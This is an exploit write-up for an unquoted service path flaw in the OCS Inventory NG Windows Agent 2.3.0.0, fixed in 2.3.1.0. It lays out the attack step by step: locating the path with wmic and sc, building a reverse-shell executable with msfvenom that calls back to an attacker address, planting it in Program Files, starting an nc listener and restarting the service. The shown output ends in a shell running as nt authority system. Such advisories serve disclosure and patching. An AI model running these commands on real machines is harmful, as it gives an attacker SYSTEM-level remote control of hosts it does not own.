OCS Inventory NG version 2.3.0.0 suffers from an unquoted service path vulnerability.
#####################################################################
# #
# Exploit Title: OCS Inventory NG 2.3.0.0 - Unquoted Service Path #
# Date: 2023/04/21 #
# Exploit Author: msd0pe #
# Vendor Homepage: https://oscinventory-ng.org #
# Software Link: https://github.com/OCSInventory-NG/WindowsAgent #
# My Github: https://github.com/msd0pe-1 #
# Fixed in version 2.3.1.0 #
# #
#####################################################################
OCS Inventory NG Windows Agent:
Versions below 2.3.1.0 contains an unquoted service path which allows attackers to escalate privileges to the system level.
[1] Find the unquoted service path:
> wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:Windows" | findstr /i /v """
OCS Inventory Service OCS Inventory Service C:Program Files (x86)OCS Inventory AgentOcsService.exe Auto
[2] Get informations about the service:
> sc qc "OCS Inventory Service"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: OCS Inventory Service
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:Program Files (x86)OCS Inventory AgentOcsService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : OCS Inventory Service
DEPENDENCIES : RpcSs
: EventLog
: Winmgmt
: Tcpip
SERVICE_START_NAME : LocalSystem
[3] Generate a reverse shell:
> msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o OCS.exe
[4] Upload the revese shell to C:Program Files (x86)OCS.exe
> put OCS.exe
> ls
drw-rw-rw- 0 Sat Apr 22 05:20:38 2023 .
drw-rw-rw- 0 Sat Apr 22 05:20:38 2023 ..
drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Common Files
-rw-rw-rw- 174 Sun Jul 24 08:12:38 2022 desktop.ini
drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Internet Explorer
drw-rw-rw- 0 Sun Jul 24 07:27:06 2022 Microsoft
drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Microsoft.NET
drw-rw-rw- 0 Sat Apr 22 04:51:20 2023 OCS Inventory Agent
-rw-rw-rw- 7168 Sat Apr 22 05:20:38 2023 OCS.exe
drw-rw-rw- 0 Sat Apr 22 03:24:58 2023 Windows Defender
drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Windows Mail
drw-rw-rw- 0 Thu Jul 28 13:00:04 2022 Windows Media Player
drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Multimedia Platform
drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows NT
drw-rw-rw- 0 Fri Oct 28 05:25:41 2022 Windows Photo Viewer
drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Portable Devices
drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 Windows Sidebar
drw-rw-rw- 0 Sun Jul 24 08:18:13 2022 WindowsPowerShell
[5] Start listener
> nc -lvp 4444
[6] Reboot the service/server
> sc stop "OCS Inventory Service"
> sc start "OCS Inventory Service"
OR
> shutdown /r
[7] Enjoy !
192.168.1.102: inverse host lookup failed: Unknown host
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309
Microsoft Windows [Version 10.0.19045.2130]
(c) Microsoft Corporation. All rights reserved.
C:Windowssystem32>whoami
nt authoritysystem
